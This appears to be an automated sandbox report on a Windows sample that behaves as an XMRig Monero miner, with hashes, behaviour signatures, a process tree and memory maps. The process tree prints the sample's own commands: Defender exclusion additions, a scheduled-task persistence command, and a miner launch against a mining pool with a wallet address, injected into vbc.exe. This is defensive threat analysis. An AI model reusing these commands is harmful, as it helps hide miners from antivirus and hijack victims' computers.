Analysis
-
max time kernel
172s -
max time network
184s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 10:53
Static task
static1
General
-
Target
060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe
-
Size
1.9MB
-
MD5
c9997fc1a83d922ad052768f2b34957b
-
SHA1
8c5a6283fd2fd20ed7309728a572331c4a5c2ae8
-
SHA256
060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178
-
SHA512
1f73c858c30ddc9199b61351a3827c651ae812e6cba6255a5c3362206157142361a84d2571bb4dd327f01ea70348a88a2e1e4c9d73ad80a7ffed4f97d7e7aeb6
-
SSDEEP
49152:j2d8gd1orIde6fk6TwHdPtBqYiV6fFKCzYSHhdMe2hVq2RWrsgzfr8:j2Wgd1orIdeWk6odPXqY3tDlMe2ho2RE
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/4328-195-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4328-194-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4328-196-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4328-197-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4328-199-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4328-203-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
PWOJ.exepid process 3132 PWOJ.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PWOJ.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation PWOJ.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
PWOJ.exedescription pid process target process PID 3132 set thread context of 4328 3132 PWOJ.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4460 timeout.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exepid process 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe 2568 powershell.exe 2600 powershell.exe 2600 powershell.exe 2568 powershell.exe 3132 PWOJ.exe 3132 PWOJ.exe 3740 powershell.exe 2064 powershell.exe 2064 powershell.exe 3740 powershell.exe 3132 PWOJ.exe 3132 PWOJ.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 660 -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 3132 PWOJ.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeLockMemoryPrivilege 4328 vbc.exe Token: SeLockMemoryPrivilege 4328 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 4328 vbc.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.execmd.exePWOJ.execmd.exedescription pid process target process PID 2344 wrote to memory of 2600 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe powershell.exe PID 2344 wrote to memory of 2600 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe powershell.exe PID 2344 wrote to memory of 2568 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe powershell.exe PID 2344 wrote to memory of 2568 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe powershell.exe PID 2344 wrote to memory of 116 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe cmd.exe PID 2344 wrote to memory of 116 2344 060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe cmd.exe PID 116 wrote to memory of 4460 116 cmd.exe timeout.exe PID 116 wrote to memory of 4460 116 cmd.exe timeout.exe PID 116 wrote to memory of 3132 116 cmd.exe PWOJ.exe PID 116 wrote to memory of 3132 116 cmd.exe PWOJ.exe PID 3132 wrote to memory of 2064 3132 PWOJ.exe powershell.exe PID 3132 wrote to memory of 2064 3132 PWOJ.exe powershell.exe PID 3132 wrote to memory of 3740 3132 PWOJ.exe powershell.exe PID 3132 wrote to memory of 3740 3132 PWOJ.exe powershell.exe PID 3132 wrote to memory of 3448 3132 PWOJ.exe cmd.exe PID 3132 wrote to memory of 3448 3132 PWOJ.exe cmd.exe PID 3448 wrote to memory of 1604 3448 cmd.exe schtasks.exe PID 3448 wrote to memory of 1604 3448 cmd.exe schtasks.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe PID 3132 wrote to memory of 4328 3132 PWOJ.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe"C:\Users\Admin\AppData\Local\Temp\060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAED.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\ProgramData\netcore\PWOJ.exe"C:\ProgramData\netcore\PWOJ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\netcore\PWOJ.exeFilesize
1.9MB
MD5c9997fc1a83d922ad052768f2b34957b
SHA18c5a6283fd2fd20ed7309728a572331c4a5c2ae8
SHA256060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178
SHA5121f73c858c30ddc9199b61351a3827c651ae812e6cba6255a5c3362206157142361a84d2571bb4dd327f01ea70348a88a2e1e4c9d73ad80a7ffed4f97d7e7aeb6
-
C:\ProgramData\netcore\PWOJ.exeFilesize
1.9MB
MD5c9997fc1a83d922ad052768f2b34957b
SHA18c5a6283fd2fd20ed7309728a572331c4a5c2ae8
SHA256060dcf3db41635a2f995e0ed15ddf9ffab0e3d462b15b91cd7b4626ca2f0a178
SHA5121f73c858c30ddc9199b61351a3827c651ae812e6cba6255a5c3362206157142361a84d2571bb4dd327f01ea70348a88a2e1e4c9d73ad80a7ffed4f97d7e7aeb6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD598baf5117c4fcec1692067d200c58ab3
SHA15b33a57b72141e7508b615e17fb621612cb8e390
SHA25630bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d
-
C:\Users\Admin\AppData\Local\Temp\tmpAED.tmp.batFilesize
139B
MD584673b8e8b5f69c370ed28047d5bdc00
SHA1c18c5363816ed3b3cc0b2a74e1c1d8d661a8cfdd
SHA25671a31294d02b24f5d14dc275580c2dfc79af01056aa8071a93b1ead8fbbb8801
SHA5123170d8cdc21d79bee2095b11504f276b41886abca574aebed255cedafccb5682181a282d622c06cb037b71c383ad35ec1b015939851c8ba3cbcbddc3105fb0d5
-
memory/116-148-0x0000000000000000-mapping.dmp
-
memory/1604-185-0x0000000000000000-mapping.dmp
-
memory/2064-177-0x0000000000000000-mapping.dmp
-
memory/2064-182-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmpFilesize
10.8MB
-
memory/2344-142-0x00007FFA12CA0000-0x00007FFA12CCB000-memory.dmpFilesize
172KB
-
memory/2344-140-0x00007FFA14220000-0x00007FFA143C1000-memory.dmpFilesize
1.6MB
-
memory/2344-135-0x00007FFA14B10000-0x00007FFA14BAE000-memory.dmpFilesize
632KB
-
memory/2344-145-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmpFilesize
10.8MB
-
memory/2344-149-0x0000000000790000-0x0000000000A6E000-memory.dmpFilesize
2.9MB
-
memory/2344-150-0x0000000000650000-0x0000000000693000-memory.dmpFilesize
268KB
-
memory/2344-151-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmpFilesize
10.8MB
-
memory/2344-136-0x00007FFA10230000-0x00007FFA10242000-memory.dmpFilesize
72KB
-
memory/2344-144-0x00007FF9F4450000-0x00007FF9F459E000-memory.dmpFilesize
1.3MB
-
memory/2344-143-0x0000000000790000-0x0000000000A6E000-memory.dmpFilesize
2.9MB
-
memory/2344-139-0x0000000000650000-0x0000000000693000-memory.dmpFilesize
268KB
-
memory/2344-138-0x0000000000790000-0x0000000000A6E000-memory.dmpFilesize
2.9MB
-
memory/2344-137-0x00007FF9F5C60000-0x00007FF9F5D1D000-memory.dmpFilesize
756KB
-
memory/2344-134-0x00007FF9F67F0000-0x00007FF9F689A000-memory.dmpFilesize
680KB
-
memory/2344-141-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmpFilesize
10.8MB
-
memory/2568-160-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmpFilesize
10.8MB
-
memory/2568-156-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmpFilesize
10.8MB
-
memory/2568-147-0x0000000000000000-mapping.dmp
-
memory/2600-146-0x0000000000000000-mapping.dmp
-
memory/2600-157-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmpFilesize
10.8MB
-
memory/2600-155-0x00007FF9F5D20000-0x00007FF9F67E1000-memory.dmpFilesize
10.8MB
-
memory/2600-152-0x0000014E5FF30000-0x0000014E5FF52000-memory.dmpFilesize
136KB
-
memory/3132-172-0x0000000000980000-0x0000000000C5E000-memory.dmpFilesize
2.9MB
-
memory/3132-188-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmpFilesize
10.8MB
-
memory/3132-174-0x00007FFA12CA0000-0x00007FFA12CCB000-memory.dmpFilesize
172KB
-
memory/3132-169-0x00007FF9F59E0000-0x00007FF9F5A9D000-memory.dmpFilesize
756KB
-
memory/3132-171-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmpFilesize
10.8MB
-
memory/3132-173-0x0000000001600000-0x0000000001643000-memory.dmpFilesize
268KB
-
memory/3132-175-0x0000000000980000-0x0000000000C5E000-memory.dmpFilesize
2.9MB
-
memory/3132-176-0x00007FF9F5890000-0x00007FF9F59DE000-memory.dmpFilesize
1.3MB
-
memory/3132-168-0x00007FFA10230000-0x00007FFA10242000-memory.dmpFilesize
72KB
-
memory/3132-202-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmpFilesize
10.8MB
-
memory/3132-179-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmpFilesize
10.8MB
-
memory/3132-167-0x00007FFA14B10000-0x00007FFA14BAE000-memory.dmpFilesize
632KB
-
memory/3132-166-0x00007FF9F6570000-0x00007FF9F661A000-memory.dmpFilesize
680KB
-
memory/3132-161-0x0000000000000000-mapping.dmp
-
memory/3132-201-0x0000000000980000-0x0000000000C5E000-memory.dmpFilesize
2.9MB
-
memory/3132-193-0x00007FFA116E0000-0x00007FFA1171B000-memory.dmpFilesize
236KB
-
memory/3132-192-0x00007FFA138D0000-0x00007FFA1393B000-memory.dmpFilesize
428KB
-
memory/3132-186-0x0000000001600000-0x0000000001643000-memory.dmpFilesize
268KB
-
memory/3132-187-0x0000000000980000-0x0000000000C5E000-memory.dmpFilesize
2.9MB
-
memory/3132-170-0x00007FFA14220000-0x00007FFA143C1000-memory.dmpFilesize
1.6MB
-
memory/3132-189-0x00007FFA12690000-0x00007FFA126B7000-memory.dmpFilesize
156KB
-
memory/3132-190-0x00007FF9F4490000-0x00007FF9F44C5000-memory.dmpFilesize
212KB
-
memory/3132-191-0x00007FF9F3630000-0x00007FF9F3732000-memory.dmpFilesize
1.0MB
-
memory/3448-184-0x0000000000000000-mapping.dmp
-
memory/3740-183-0x00007FF9F5AA0000-0x00007FF9F6561000-memory.dmpFilesize
10.8MB
-
memory/3740-178-0x0000000000000000-mapping.dmp
-
memory/4328-200-0x0000023154F80000-0x0000023154FC0000-memory.dmpFilesize
256KB
-
memory/4328-196-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/4328-197-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/4328-198-0x0000023154F30000-0x0000023154F50000-memory.dmpFilesize
128KB
-
memory/4328-199-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/4328-194-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/4328-195-0x0000000140343234-mapping.dmp
-
memory/4328-203-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/4328-204-0x0000023154FC0000-0x0000023154FE0000-memory.dmpFilesize
128KB
-
memory/4328-205-0x0000023154FE0000-0x0000023155000000-memory.dmpFilesize
128KB
-
memory/4328-206-0x0000023154FC0000-0x0000023154FE0000-memory.dmpFilesize
128KB
-
memory/4328-207-0x0000023154FE0000-0x0000023155000000-memory.dmpFilesize
128KB
-
memory/4460-154-0x0000000000000000-mapping.dmp